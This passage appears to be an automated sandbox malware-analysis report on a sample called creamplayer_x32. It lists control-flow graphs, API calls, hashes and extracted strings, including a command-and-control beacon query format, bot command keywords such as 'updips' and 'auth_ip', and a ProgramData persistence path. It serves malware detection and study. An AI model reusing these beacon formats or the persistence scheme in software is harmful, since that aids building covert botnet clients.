537->548 549 2d4683b-2d4684a call 2d5133c 537->549 541->499 548->499 549->499 562 2d46850-2d46852 549->562 550->499 550->520 562->499 565 2d46858-2d46871 call 2d4439c 562->565 565->499 571 2d46877-2d46946 call 2d51418 call 2d41ba7 565->571 580 2d4694d-2d4696e RtlEnterCriticalSection 571->580 581 2d46948 call 2d4143f 571->581 586 2d46970-2d46977 580->586 587 2d4697a-2d469e1 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d47330 580->587 581->580 582->583 588 2d465db-2d465ed call 2d5133c 582->588 584 2d46616-2d46644 call 2d51fac call 2d53750 call 2d4439c 583->584 606 2d46685-2d4668e call 2d51f74 584->606 607 2d46646-2d46655 call 2d525e6 584->607 586->587 608 2d469e7-2d46a29 call 2d4971a 587->608 609 2d46b49-2d46b5d call 2d47ff8 587->609 588->583 595 2d465ef-2d46610 call 2d4439c 588->595 595->584 620 2d46694-2d466ac call 2d527b5 606->620 621 2d467b1-2d467be 606->621 607->606 622 2d46657 607->622 618 2d46b13-2d46b44 call 2d473df call 2d433b2 608->618 619 2d46a2f-2d46a36 608->619 609->499 618->609 624 2d46a39-2d46a3e 619->624 634 2d466ae-2d466b6 call 2d4872c 620->634 635 2d466b8 620->635 621->499 626 2d4665c-2d4666e call 2d51850 622->626 624->624 629 2d46a40-2d46a85 call 2d4971a 624->629 637 2d46670 626->637 638 2d46673-2d46683 call 2d525e6 626->638 629->618 643 2d46a8b-2d46a91 629->643 636 2d466ba-2d4675e call 2d49844 call 2d43863 call 2d45119 call 2d43863 call 2d49aea call 2d49c04 634->636 635->636 664 2d46765-2d46790 Sleep call 2d508f0 636->664 665 2d46760 call 2d4380b 636->665 637->638 638->606 638->626 647 2d46a94-2d46a99 643->647 647->647 649 2d46a9b-2d46ad6 call 2d4971a 647->649 649->618 655 2d46ad8-2d46b12 call 2d4c10c 649->655 655->618 669 2d46792-2d4679b call 2d44100 664->669 670 2d4679c-2d467aa 664->670 665->664 669->670 670->621 672 2d467ac call 2d4380b 670->672 672->621
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d, xrefs: 02D46034
                                                                                                    • ntdll.dll, xrefs: 02D45EAA
                                                                                                    • Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US), xrefs: 02D4611A
                                                                                                    • strcat, xrefs: 02D45EA5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _malloc$Heap$_memset$AllocateProcess$AddressProc$CountHandleModuleTickVersion
                                                                                                    • String ID: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$gpt=%.8x&advizor=%d&box=%d&hp=%x&lp=%x&line=%d&os=%d.%d.%04d&flag=%d&itd=%d$ntdll.dll$strcat
                                                                                                    • API String ID: 2775057841-1415453879
                                                                                                    • Opcode ID: f5874e376e99e0affbff294687fded759c3fe789043990a2ca0ce732feff095f
                                                                                                    • Instruction ID: 8518acd95e5235935b302e84ff09c5ae4c6ce3aa0ab06da2c93d7632362f77d1
                                                                                                    • Opcode Fuzzy Hash: f5874e376e99e0affbff294687fded759c3fe789043990a2ca0ce732feff095f
                                                                                                    • Instruction Fuzzy Hash: F461A472D483509BD7116F74A808B5B7BE4EF95304F640C1EF58897381DBB88C59CBA6

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 675 2d46411-2d46439 676 2d46455-2d4645f 675->676 677 2d4643b-2d46441 675->677 678 2d46465-2d46489 call 2d53750 call 2d4439c 676->678 679 2d460e1-2d460e3 676->679 680 2d46447-2d46454 call 2d4534d 677->680 681 2d46443-2d46445 677->681 678->679 693 2d4648f-2d464ba RtlEnterCriticalSection RtlLeaveCriticalSection call 2d5133c 678->693 684 2d460e5-2d460ea 679->684 685 2d460ec-2d460ee 679->685 680->676 681->676 690 2d460f5 Sleep 684->690 687 2d460f0 685->687 688 2d460fb-2d4612a RtlEnterCriticalSection RtlLeaveCriticalSection 685->688 687->690 688->675 690->688 696 2d46504-2d4651c call 2d5133c 693->696 697 2d464bc-2d464cb call 2d5133c 693->697 702 2d46522-2d46524 696->702 703 2d467c3-2d467d2 call 2d5133c 696->703 697->696 704 2d464cd-2d464dc call 2d5133c 697->704 702->703 706 2d4652a-2d465d5 call 2d51fac RtlEnterCriticalSection RtlLeaveCriticalSection call 2d53750 * 5 call 2d4439c * 2 702->706 712 2d467d4-2d467d6 703->712 713 2d46817-2d46826 call 2d5133c 703->713 704->696 711 2d464de-2d464ed call 2d5133c 704->711 758 2d465d7-2d465d9 706->758 759 2d46612 706->759 711->696 726 2d464ef-2d464fe call 2d5133c 711->726 712->713 717 2d467d8-2d46812 call 2d53750 RtlEnterCriticalSection RtlLeaveCriticalSection 712->717 724 2d46828-2d46836 call 2d45c02 call 2d45d10 713->724 725 2d4683b-2d4684a call 2d5133c 713->725 717->679 724->679 725->679 738 2d46850-2d46852 725->738 726->679 726->696 738->679 741 2d46858-2d46871 call 2d4439c 738->741 741->679 747 2d46877-2d46946 call 2d51418 call 2d41ba7 741->747 756 2d4694d-2d4696e RtlEnterCriticalSection 747->756 757 2d46948 call 2d4143f 747->757 762 2d46970-2d46977 756->762 763 2d4697a-2d469e1 RtlLeaveCriticalSection call 2d43c67 call 2d43d7e call 2d47330 756->763 757->756 758->759 764 2d465db-2d465ed call 2d5133c 758->764 760 2d46616-2d46644 call 2d51fac call 2d53750 call 2d4439c 759->760 782 2d46685-2d4668e call 2d51f74 760->782 783 2d46646-2d46655 call 2d525e6 760->783 762->763 784 2d469e7-2d46a29 call 2d4971a 763->784 785 2d46b49-2d46b5d call 2d47ff8 763->785 764->759 771 2d465ef-2d46610 call 2d4439c 764->771 771->760 796 2d46694-2d466ac call 2d527b5 782->796 797 2d467b1-2d467be 782->797 783->782 798 2d46657 783->798 794 2d46b13-2d46b44 call 2d473df call 2d433b2 784->794 795 2d46a2f-2d46a36 784->795 785->679 794->785 800 2d46a39-2d46a3e 795->800 810 2d466ae-2d466b6 call 2d4872c 796->810 811 2d466b8 796->811 797->679 802 2d4665c-2d4666e call 2d51850 798->802 800->800 805 2d46a40-2d46a85 call 2d4971a 800->805 813 2d46670 802->813 814 2d46673-2d46683 call 2d525e6 802->814 805->794 819 2d46a8b-2d46a91 805->819 812 2d466ba-2d4675e call 2d49844 call 2d43863 call 2d45119 call 2d43863 call 2d49aea call 2d49c04 810->812 811->812 840 2d46765-2d46790 Sleep call 2d508f0 812->840 841 2d46760 call 2d4380b 812->841 813->814 814->782 814->802 823 2d46a94-2d46a99 819->823 823->823 825 2d46a9b-2d46ad6 call 2d4971a 823->825 825->794 831 2d46ad8-2d46b12 call 2d4c10c 825->831 831->794 845 2d46792-2d4679b call 2d44100 840->845 846 2d4679c-2d467aa 840->846 841->840 845->846 846->797 848 2d467ac call 2d4380b 846->848 848->797
                                                                                                    APIs
                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 02D460F5
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D46100
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D46111
                                                                                                      • Part of subcall function 02D527B5: _malloc.LIBCMT ref: 02D527CD
                                                                                                    • _memset.LIBCMT ref: 02D46471
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D46494
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D464A5
                                                                                                    • _malloc.LIBCMT ref: 02D4652C
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D4653E
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D4654A
                                                                                                    • _memset.LIBCMT ref: 02D46564
                                                                                                    • _memset.LIBCMT ref: 02D46573
                                                                                                    • _memset.LIBCMT ref: 02D46583
                                                                                                    • _memset.LIBCMT ref: 02D46592
                                                                                                    • _memset.LIBCMT ref: 02D465A1
                                                                                                    • _malloc.LIBCMT ref: 02D4661B
                                                                                                    • _memset.LIBCMT ref: 02D4662C
                                                                                                    • _strtok.LIBCMT ref: 02D4664C
                                                                                                    • _swscanf.LIBCMT ref: 02D46663
                                                                                                    • _strtok.LIBCMT ref: 02D4667A
                                                                                                    • _free.LIBCMT ref: 02D46686
                                                                                                    • Sleep.KERNEL32(000007D0), ref: 02D4676A
                                                                                                    • _memset.LIBCMT ref: 02D467E3
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D467F0
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D46802
                                                                                                      • Part of subcall function 02D4872C: __EH_prolog.LIBCMT ref: 02D48731
                                                                                                      • Part of subcall function 02D4872C: RtlEnterCriticalSection.NTDLL(00000020), ref: 02D487AC
                                                                                                      • Part of subcall function 02D4872C: RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D487CA
                                                                                                    • _sprintf.LIBCMT ref: 02D4688C
                                                                                                    • RtlEnterCriticalSection.NTDLL(00000020), ref: 02D46951
                                                                                                    • RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D46985
                                                                                                      • Part of subcall function 02D45C02: _malloc.LIBCMT ref: 02D45C10
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$_memset$EnterLeave$_malloc$Sleep_strtok$H_prolog_free_sprintf_swscanf
                                                                                                    • String ID: $%d;$<htm$Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)$auth_ip$auth_swith$block$connect$disconnect$idle$updips$updurls
                                                                                                    • API String ID: 3337033272-2823103634
                                                                                                    • Opcode ID: 857c3f2ee627e33f93676bfc724cef6ba4da36df269fc59d577f7f2c058b63b9
                                                                                                    • Instruction ID: 06a5f6805f2d0e978c2d13842820b5a05f95d58d38177993110f9fcfd0aa36c7
                                                                                                    • Opcode Fuzzy Hash: 857c3f2ee627e33f93676bfc724cef6ba4da36df269fc59d577f7f2c058b63b9
                                                                                                    • Instruction Fuzzy Hash: 851205716083819BE7249B24D855BAFB7E9EFC6714F10481EE48A97391EF70DC48CB62

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D41D11
                                                                                                    • GetLastError.KERNEL32 ref: 02D41D23
                                                                                                      • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02D41D59
                                                                                                    • GetLastError.KERNEL32 ref: 02D41D6B
                                                                                                    • __beginthreadex.LIBCMT ref: 02D41DB1
                                                                                                    • GetLastError.KERNEL32 ref: 02D41DC6
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D41DDD
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D41DEC
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D41E14
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02D41E1B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseErrorHandleLast$CreateEvent$H_prologObjectSingleWait__beginthreadex
                                                                                                    • String ID: thread$thread.entry_event$thread.exit_event
                                                                                                    • API String ID: 831262434-3017686385
                                                                                                    • Opcode ID: 461d11b6edf76bbb4c3126bec9ad8ad400af27df990a8916b253dc6749b739ca
                                                                                                    • Instruction ID: 928c5f243e2d6b98f4232d4c6eac1994f34ccff0faba0b82155b9ea3ea044029
                                                                                                    • Opcode Fuzzy Hash: 461d11b6edf76bbb4c3126bec9ad8ad400af27df990a8916b253dc6749b739ca
                                                                                                    • Instruction Fuzzy Hash: 4D313975A043119FD700EF24D888B2BBBA5EF84750F104969F9599B390DB70DD89CBE2

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D44D8B
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D44DB7
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D44DC3
                                                                                                      • Part of subcall function 02D44BED: __EH_prolog.LIBCMT ref: 02D44BF2
                                                                                                      • Part of subcall function 02D44BED: InterlockedExchange.KERNEL32(?,00000000), ref: 02D44CF2
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D44E93
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D44E99
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D44EA0
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D44EA6
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D450A7
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D450AD
                                                                                                    • RtlEnterCriticalSection.NTDLL(02D74FC8), ref: 02D450B8
                                                                                                    • RtlLeaveCriticalSection.NTDLL(02D74FC8), ref: 02D450C1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$H_prolog$ExchangeInterlocked
                                                                                                    • String ID:
                                                                                                    • API String ID: 2062355503-0
                                                                                                    • Opcode ID: 0a52b92b8eca6bc04169b2c5e7b618682797097e5be328b9a7f824430b85b086
                                                                                                    • Instruction ID: 9d020aa834d007dce23436eff9b4da012d8bff4d44c8c6bac66ed3dcaa878653
                                                                                                    • Opcode Fuzzy Hash: 0a52b92b8eca6bc04169b2c5e7b618682797097e5be328b9a7f824430b85b086
                                                                                                    • Instruction Fuzzy Hash: C1B13871D0425E9FEF21DFA0D844BEEBBB5EF14318F24405AE40566280DBB56E89CFA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 952 401301-40135e FindResourceA 953 401360-401362 952->953 954 401367-40137d SizeofResource 952->954 957 401538-40153c 953->957 955 401386-4013fe LoadResource LockResource GlobalAlloc call 4023e0 * 2 954->955 956 40137f-401381 954->956 962 401407-40140b 955->962 956->957 963 40140d-40141d 962->963 964 40141f-401428 GetTickCount 962->964 963->962 966 401491-401499 964->966 967 40142a-40142e 964->967 968 4014a2-4014a8 966->968 969 401430-401438 967->969 970 40148f 967->970 971 4014f0-401525 GlobalAlloc call 401000 968->971 972 4014aa-4014e8 968->972 973 401441-401447 969->973 970->971 980 40152a-401535 971->980 974 4014ea 972->974 975 4014ee 972->975 977 401449-401485 973->977 978 40148d 973->978 974->975 975->968 981 401487 977->981 982 40148b 977->982 978->967 980->957 981->982 982->973
                                                                                                    APIs
                                                                                                    • FindResourceA.KERNEL32(?,0000000A), ref: 00401351
                                                                                                    • SizeofResource.KERNEL32(00000000), ref: 00401370
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Resource$FindSizeof
                                                                                                    • String ID:
                                                                                                    • API String ID: 3019604839-3916222277
                                                                                                    • Opcode ID: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                                    • Instruction ID: 99c0fe4c6fcc412865ae331c3b3e6021d15f3ce72c6bf11de14b0ecb449eac57
                                                                                                    • Opcode Fuzzy Hash: d05602b0e20a881077e161112d5bd34232c8f71c7560e683aad862cf59917e15
                                                                                                    • Instruction Fuzzy Hash: 7D810275D04259DFDF01CFE8D985AEEBBB0BF09305F1400A6E541B72A2C3385A85DB69

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.NTDLL(?), ref: 02D42706
                                                                                                    • CreateWaitableTimerA.KERNEL32(00000000,00000000,00000000), ref: 02D4272B
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02D63163), ref: 02D42738
                                                                                                      • Part of subcall function 02D41712: __EH_prolog.LIBCMT ref: 02D41717
                                                                                                    • SetWaitableTimer.KERNEL32(?,?,000493E0,00000000,00000000,00000000), ref: 02D42778
                                                                                                    • RtlLeaveCriticalSection.NTDLL(?), ref: 02D427D9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSectionTimerWaitable$CreateEnterErrorH_prologLastLeave
                                                                                                    • String ID: timer
                                                                                                    • API String ID: 4293676635-1792073242
                                                                                                    • Opcode ID: e38710ae991459d4c4b2710b3ef884eee42d1200cc16d921774f6c21b8b37c2b
                                                                                                    • Instruction ID: 4d15b9d9073b61f6567a1f56052797aa3b892fa2fe102b1045681dcfb44fe0c3
                                                                                                    • Opcode Fuzzy Hash: e38710ae991459d4c4b2710b3ef884eee42d1200cc16d921774f6c21b8b37c2b
                                                                                                    • Instruction Fuzzy Hash: F5317AB1904705AFD310DF65D888B26BBA8FB48765F004A2AF85582B80EB70ED54CFA1

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1118 2d41ba7-2d41bcf call 2d62a00 RtlEnterCriticalSection 1121 2d41bd1 1118->1121 1122 2d41be9-2d41bf7 RtlLeaveCriticalSection call 2d4d325 1118->1122 1123 2d41bd4-2d41be0 call 2d41b79 1121->1123 1124 2d41bfa-2d41c20 RtlEnterCriticalSection 1122->1124 1128 2d41c55-2d41c6e RtlLeaveCriticalSection 1123->1128 1129 2d41be2-2d41be7 1123->1129 1127 2d41c34-2d41c36 1124->1127 1130 2d41c22-2d41c2f call 2d41b79 1127->1130 1131 2d41c38-2d41c43 1127->1131 1129->1122 1129->1123 1133 2d41c45-2d41c4b 1130->1133 1136 2d41c31 1130->1136 1131->1133 1133->1128 1135 2d41c4d-2d41c51 1133->1135 1135->1128 1136->1127
                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 02D41BAC
                                                                                                    • RtlEnterCriticalSection.NTDLL ref: 02D41BBC
                                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 02D41BEA
                                                                                                    • RtlEnterCriticalSection.NTDLL ref: 02D41C13
                                                                                                    • RtlLeaveCriticalSection.NTDLL ref: 02D41C56
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$EnterLeave$H_prolog
                                                                                                    • String ID:
                                                                                                    • API String ID: 1633115879-0
                                                                                                    • Opcode ID: 4fa358b6a379bf75fc9bb77f415bcf6a0b86c715e3b08bc91c7cb3893bd823b7
                                                                                                    • Instruction ID: 8b2ef89c08482791613291b5071c3c7e2ec6046271d9cd5c991110b62498899d
                                                                                                    • Opcode Fuzzy Hash: 4fa358b6a379bf75fc9bb77f415bcf6a0b86c715e3b08bc91c7cb3893bd823b7
                                                                                                    • Instruction Fuzzy Hash: 8521AB75A00214DFDB14CF68D8487AABBB5FF49714F208549E81997300DB71EE85CBE0

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetVersion.KERNEL32 ref: 00402996
                                                                                                      • Part of subcall function 00403AB4: HeapCreate.KERNEL32(00000000,00001000,00000000,004029CF,00000000), ref: 00403AC5
                                                                                                      • Part of subcall function 00403AB4: HeapDestroy.KERNEL32 ref: 00403B04
                                                                                                    • GetCommandLineA.KERNEL32 ref: 004029E4
                                                                                                    • GetStartupInfoA.KERNEL32(?), ref: 00402A0F
                                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402A32
                                                                                                      • Part of subcall function 00402A8B: ExitProcess.KERNEL32 ref: 00402AA8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                                                    • String ID:
                                                                                                    • API String ID: 2057626494-0
                                                                                                    • Opcode ID: 12420a6f8d859e7cb1559808f7d7871c5152186d5c4e15c43186c2bde801d951
                                                                                                    • Instruction ID: a5d49b7249978d3965762e6696208bd63d45c978be5a3a1e89be3984253889d2
                                                                                                    • Opcode Fuzzy Hash: 12420a6f8d859e7cb1559808f7d7871c5152186d5c4e15c43186c2bde801d951
                                                                                                    • Instruction Fuzzy Hash: 89218EB1900605AADB14AFB6DE49A6E7FA8EB04705F10413FF905BB2D1DF384500CA6C

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1166 2d42edd-2d42f1f WSASetLastError WSASocketA call 2d4fb10 WSAGetLastError 1169 2d42f21-2d42f25 1166->1169 1170 2d42f49-2d42f4f 1166->1170 1171 2d42f27-2d42f36 setsockopt 1169->1171 1172 2d42f3c-2d42f47 call 2d4fb10 1169->1172 1171->1172 1172->1170
                                                                                                    APIs
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42EEE
                                                                                                    • WSASocketA.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D42EFD
                                                                                                    • WSAGetLastError.WS2_32(?,?,?,00000000,00000000,00000001), ref: 02D42F0C
                                                                                                    • setsockopt.WS2_32(00000000,00000029,0000001B,00000000,00000004), ref: 02D42F36
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$Socketsetsockopt
                                                                                                    • String ID:
                                                                                                    • API String ID: 2093263913-0
                                                                                                    • Opcode ID: 5e0b715fafa348a95e8c14b9c907b0c87c2d8608882e8d0c655ebe5ed91b7ace
                                                                                                    • Instruction ID: df596870a567c87d16d9e6666a5ca59fd9a8d914a8093190a6e61249e2f0b002
                                                                                                    • Opcode Fuzzy Hash: 5e0b715fafa348a95e8c14b9c907b0c87c2d8608882e8d0c655ebe5ed91b7ace
                                                                                                    • Instruction Fuzzy Hash: C5017575A00214BBDB209F66DC4CB5A7BA9DB86761F408965F9189B291DB748D00CBB0

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1175 2d42db5-2d42dc8 1176 2d42de4-2d42de8 1175->1176 1177 2d42dca-2d42dd2 call 2d4fb10 1175->1177 1179 2d42dfc-2d42e07 call 2d42d39 1176->1179 1180 2d42dea-2d42ded 1176->1180 1184 2d42dd8 1177->1184 1186 2d42e0c-2d42e11 1179->1186 1180->1179 1182 2d42def-2d42dfa call 2d4fb10 1180->1182 1182->1184 1187 2d42ddb 1184->1187 1189 2d42e13 1186->1189 1190 2d42ddd-2d42de3 1186->1190 1187->1190 1191 2d42e16-2d42e18 1189->1191 1191->1187 1192 2d42e1a-2d42e35 call 2d4fb10 call 2d4166f 1191->1192 1197 2d42e54-2d42e97 WSASetLastError select call 2d494fe 1192->1197 1198 2d42e37-2d42e52 call 2d4fb10 call 2d4166f 1192->1198 1204 2d42ea6 1197->1204 1205 2d42e99-2d42ea4 call 2d4fb10 1197->1205 1198->1187 1198->1197 1206 2d42eb6-2d42eb8 1204->1206 1207 2d42ea8-2d42eb3 call 2d4fb10 1204->1207 1211 2d42ebe-2d42ed2 call 2d42d39 1205->1211 1206->1187 1206->1211 1207->1206 1211->1191 1216 2d42ed8 1211->1216 1216->1190
                                                                                                    APIs
                                                                                                      • Part of subcall function 02D42D39: WSASetLastError.WS2_32(00000000), ref: 02D42D47
                                                                                                      • Part of subcall function 02D42D39: WSASend.WS2_32(?,?,?,?,00000000,00000000,00000000), ref: 02D42D5C
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42E6D
                                                                                                    • select.WS2_32(?,00000000,00000001,00000000,00000000), ref: 02D42E83
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$Sendselect
                                                                                                    • String ID: 3'
                                                                                                    • API String ID: 2958345159-280543908
                                                                                                    • Opcode ID: 0ff5dc942d60aaadda770ad0fb9d8031c6f8f5d713df86d6c15a2fe8f6e823ca
                                                                                                    • Instruction ID: 598f815181d144a13613b4ba7a2184b7ff12e03a48db366d95513747752a04aa
                                                                                                    • Opcode Fuzzy Hash: 0ff5dc942d60aaadda770ad0fb9d8031c6f8f5d713df86d6c15a2fe8f6e823ca
                                                                                                    • Instruction Fuzzy Hash: 44317CB1A102159FDB10DFA4D8587EEBBAAEF05394F00456AEC0597740EF759D90CBE0
                                                                                                    APIs
                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 02D42AEA
                                                                                                    • connect.WS2_32(?,?,?), ref: 02D42AF5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D41000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_2d41000_creamplayer_x32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLastconnect
                                                                                                    • String ID: 3'
                                                                                                    • API String ID: 374722065-280543908
                                                                                                    • Opcode ID: 1f2bdd04d95f0b90c0976e6107fc31642abada8876349d992fd0f1f5810032e5
                                                                                                    • Instruction ID: fcddac10be79ab1f770deff703ccdc138ad665e92f083a3cc89916851bbebfce
                                                                                                    • Opcode Fuzzy Hash: 1f2bdd04d95f0b90c0976e6107fc31642abada8876349d992fd0f1f5810032e5
                                                                                                    • Instruction Fuzzy Hash: 85219570E00214ABCF10AFA4D5186AEBBBAEF45364F504599EC5893384DF749E018BA1
                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?,00000001), ref: 0040D50F
                                                                                                    Strings
                                                                                                    • C:\ProgramData\SmartImageDrive\SmartImageDrive.exe, xrefs: 00401940, 0040201E
                                                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0040D5E3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000005.00000002.2614349634.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000005.00000002.2614349634.000000000040B000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_5_2_400000_creamplayer_x32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Open
                                                                                                    • String ID: C:\ProgramData\SmartImageDrive\SmartImageDrive.exe$Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                    • API String ID: 71445658-2779163671
